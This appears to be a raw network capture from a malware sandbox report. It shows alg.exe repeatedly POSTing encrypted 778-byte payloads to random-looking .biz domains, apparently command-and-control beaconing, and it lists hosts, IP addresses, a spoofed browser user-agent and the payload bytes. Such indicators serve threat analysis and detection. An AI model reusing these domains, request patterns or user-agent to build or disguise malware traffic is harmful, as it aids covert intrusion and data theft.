                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=efe4555ddffce5c8d37a0630839d1a55|155.94.241.188|1730130690|1730130690|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
52          192.168.2.5  50028        18.208.156.248  80                2636  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:51:31.147864103 CET  353                OUT        POST /xcibcauw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.147901058 CET778OUTData Raw: 57 a8 e9 3e e9 18 69 90 fe 02 00 00 8e 1c 34 0c 99 d2 15 21 4c d4 a8 39 c3 d0 21 c9 ab 7c b2 21 d8 5b cd 33 27 ba fc c9 fd 78 5f 74 dc 6d a4 4e fa 59 75 fe 99 36 69 f0 d0 e1 89 ba e8 55 6a 7a 7c d6 14 1a 6c c5 73 4a f2 8c db 32 28 9e 5e ca 06 9f
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: W>i4!L9!|![3'x_tmNYu6iUjz|lsJ2(^l|udO_ 3n{@*%YKE|TtjpK^ZrHapq_@"kw"Bg*&'o/)970_Ipk3'E]~!VCf
Oct 28, 2024 16:51:31.799316883 CET  417                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=21cc95fdfed95677658cce985fb2dfc7|155.94.241.188|1730130691|1730130691|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
53          192.168.2.5  50029        13.251.16.150   80                2636  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:51:31.874021053 CET  351                OUT        POST /assjekuls HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.874051094 CET778OUTData Raw: e8 21 59 3b 64 2f eb 90 fe 02 00 00 3a c1 b5 98 5f e2 06 91 28 3a dd ba b8 7e bf c7 7e 60 98 00 94 36 ba 42 12 3c 41 15 6d ae 2b d1 a0 4b 52 a7 76 bc 9a 09 a2 79 81 72 c5 2b 8d 01 e7 2b b5 79 03 8c 0a e5 eb a0 c6 04 7f 77 e1 14 72 44 28 53 3c 05
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: !Y;d/:_(:~~`6B<Am+KRvyr++ywrD(S<UP9-v!FfO9XDeCsRap58Mgoj7+2w'S\:]|=m,*8@B)4sH+4Y$KO]hQ~\c_OhP)8&Z
Oct 28, 2024 16:51:33.305397987 CET  414                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=0948c094aa2dea2752cb3f542f2addb5|155.94.241.188|1730130693|1730130693|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
54          192.168.2.5  50030        34.246.200.160  80                2636  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:51:33.337615967 CET  351                OUT        POST /isekcf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.337645054 CET778OUTData Raw: a5 82 fd 4b 52 dd 09 09 fe 02 00 00 e5 c0 30 30 b1 46 1d ad c6 90 21 98 c6 99 d2 a4 6b cd 06 2f 92 fb a8 06 3a 5e 74 c3 2d cb 2b ea 13 12 99 23 c7 56 b2 ca b3 2b 1c 64 98 a5 c4 fc af c0 03 ad cf df 79 b1 25 65 3c 4f 8b 7e 71 06 f1 43 14 10 e0 44
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: KR00F!k/:^t-+#V+dy%e<O~qCD87!?XY}o> {_<JSg5[|^u:qV60TRO#bw4Y=[XI!<iDnRA{Ri3{Hc;s2y%3F
Oct 28, 2024 16:51:34.333245993 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=69afd326d0e0a19f21a3754425cb08fe|155.94.241.188|1730130694|1730130694|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.5 | 50031 | 18.141.10.107 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:34.399827003 CET | 356 | OUT | POST /gneewdogqwseu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:34.399847031 CET | 778 | OUT | Data Raw: cc 09 26 87 a8 28 f2 e4 fe 02 00 00 0e e3 30 89 e1 0d 6e 95 28 df ba 8d 09 bf 55 db ac 78 b0 e1 99 bf 1d cc aa 91 d8 a5 0f b0 4a 5f 66 44 22 e4 78 80 5f 12 25 78 20 66 b5 1c 07 e6 ec e1 45 5d c4 09 f6 13 40 04 9a 57 72 05 6b 3c f7 a8 af dc bf 13
Oct 28, 2024 16:51:35.816320896 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=94471f6d17386ce5daab674d1b7114c8|155.94.241.188|1730130695|1730130695|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.5 | 50032 | 13.251.16.150 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:35.898600101 CET | 351 | OUT | POST /onpfurgnxg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:35.898655891 CET | 778 | OUT | Data Raw: 20 c4 c2 77 fc 6b 56 5f fe 02 00 00 99 32 b9 72 05 7d b0 4f 51 11 1a f0 12 96 b3 09 32 2e bd 05 ee 5e 3a f1 64 dd aa 01 7c 09 12 ff a1 d5 fc 5d dc ee f8 9b ff da ad f1 d3 24 97 01 c6 a5 9b e1 02 5a 9d be a9 1c d3 de c4 a1 51 5c b9 b8 0b 84 99 7b
Oct 28, 2024 16:51:37.315936089 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=283a6632d6fa2f431860a4401c60393c|155.94.241.188|1730130697|1730130697|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.5 | 50033 | 18.208.156.248 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:37.337641954 CET | 358 | OUT | POST /roauatfpewvsf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:37.337667942 CET | 778 | OUT | Data Raw: ac 5b ab 92 8b 05 15 5d fe 02 00 00 4a be bf 40 e6 28 63 e4 eb f1 8a ec 33 a9 b9 b2 30 b5 c2 7e f6 29 65 60 ce f0 ca 0b 96 02 52 9d f9 80 07 42 e7 43 f4 27 36 c2 8b 23 67 4a 70 da d5 55 4c 6b 03 38 89 69 27 f4 99 36 a8 91 66 3c 2a 01 dc fc f3 d8
Oct 28, 2024 16:51:38.031399012 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=d44bc9711a4061cce67c8e18edc849da|155.94.241.188|1730130697|1730130697|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.5 | 50034 | 18.246.231.120 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:38.055713892 CET | 346 | OUT | POST /aixrt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:38.055773973 CET | 778 | OUT | Data Raw: d4 47 16 a5 b4 45 89 46 fe 02 00 00 1b 11 dc ec 69 dc ab 78 72 bb 5b 54 ca 51 ef ca f0 10 1e be 1d 56 c3 35 61 85 41 31 7a 00 dc 01 db 59 4b ca be 05 dd 02 f2 39 c1 3a 56 d6 33 c1 f6 3d 69 9d d9 ac 48 d6 c1 ee 53 09 66 77 a6 7a 8e be 9a 27 0f ec
Data Ascii: GEFixr[TQV5aA1zYK9:V3=iHSfwz'CjRr21a3#p@ w76WsQzmOnybs7)%)am%UFp|)Fi*GBN.SBn4?x=#4lH-g$:QI#eht:?:_XB'
Oct 28, 2024 16:51:38.882219076 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b27d88f0ac053d093162b936896aa103|155.94.241.188|1730130698|1730130698|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.5 | 50035 | 44.221.84.105 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:38.910871983 CET | 354 | OUT | POST /moaxleedvt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hehckyov.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:38.910923004 CET | 778 | OUT | Data Raw: cd 34 89 57 3a a0 6d 75 fe 02 00 00 0f c7 01 bd 0d cc e2 68 08 8d e2 46 97 9f 76 4c df 3f 76 2f a6 8c 3f aa e7 58 44 af 9a a0 d5 30 00 c1 8f bc 90 bb da 58 ba c2 ef 1f 37 5b e8 84 fe 5b dd ae 8f 25 e2 75 a6 6a 8c fd f8 24 59 21 b2 3f 13 b6 c7 58
Data Ascii: 4W:muhFvL?v/?XD0X7[[%uj$Y!?X{Ed9L3=zKF/d@iupdFQmatC9*F|*T M1J,Db`-+q|9c&HL_c%C3eosu6IkGG
Oct 28, 2024 16:51:39.574330091 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=07813e85462d6ed512a6919f6acc6c32|155.94.241.188|1730130699|1730130699|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.5 | 50036 | 54.244.188.177 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:39.787156105 CET | 349 | OUT | POST /sspabsr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:39.787187099 CET | 778 | OUT | Data Raw: f6 ec b8 fe 1e 11 b0 20 fe 02 00 00 86 0b 8b 5e e5 c4 36 20 41 cd 6c 1a 4a d3 66 6c 5b 86 0c 6c 21 d3 3f bd 44 98 31 cf d8 7a f8 bd 28 95 62 09 83 70 31 ef ba f2 a0 91 78 66 a2 b5 be 6c 37 83 07 df 20 12 4d 2c f9 d2 57 df 04 f0 4f d5 32 e4 43 b9
Data Ascii: ^6 AlJfl[l!?D1z(bp1xfl7 M,WO2C(F)7Zpl0z/.b0lB5JN\2`5,C0m"a<GsNE!}b;(<PO9gM":>?+vQIdbDZ+md&%Mk
Oct 28, 2024 16:51:40.629626989 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1d232b9d4330d9c9624d3e0078d55d82|155.94.241.188|1730130700|1730130700|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.5 | 50037 | 3.254.94.185 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:40.652286053 CET | 353 | OUT | POST /qrtkifykhcnq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:40.652313948 CET | 778 | OUT | Data Raw: eb dd 63 b1 5a 16 6b bf fe 02 00 00 ae 01 aa ae 5b 14 5d 74 66 48 17 7f 6d ad 00 59 d1 e8 82 5c af 72 34 c2 e3 bc 83 73 c0 9b ec e3 c9 fe 2e 6a 88 c9 61 85 65 00 8a 26 ab 02 89 ab 18 ed 31 24 d3 95 01 ea 84 12 72 e8 6c d5 b4 b1 66 d6 f9 68 b8 80
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: cZk[]tfHmY\r4s.jae&1$rlfh'|>5AFfYa}ZoI9p^*gKcHrg7,R=b+9L|(`U3P=:\oP-ty*KAcl5O
Oct 28, 2024 16:51:41.619568110 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=5f8008db04316a410cc11071b9e42bf9|155.94.241.188|1730130701|1730130701|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.5 | 50038 | 18.141.10.107 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:41.640803099 CET | 358 | OUT | POST /sduodvbdxsrqja HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:41.640830994 CET | 778 | OUT | Data Raw: e1 9a d1 f7 51 4c f5 20 fe 02 00 00 82 88 aa c8 ae 87 61 c9 cd 58 e3 a7 ac bd c9 c9 96 f6 06 fd ef 0a 01 2a 2d 84 e2 40 33 53 4d a1 75 7f 45 0e 26 42 e9 2a d5 d1 ac 26 02 db 47 c0 54 a6 b7 e4 1e 85 fe 02 92 24 f3 5d 36 36 46 6e b9 4f 1e 95 80 de
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: QL aX*-@3SMuE&B*&GT$]66FnOR,#vm>9_gLzr1y!lgq6p4N#cLZ#C.Q>J`vju.OAgO6U?F~OxVFC"PN<4'f$?s
Oct 28, 2024 16:51:43.059278965 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=d6cdca91d20216e2c232262d723205ee|155.94.241.188|1730130702|1730130702|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.5 | 50039 | 34.246.200.160 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:43.085338116 CET | 348 | OUT | POST /guistk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
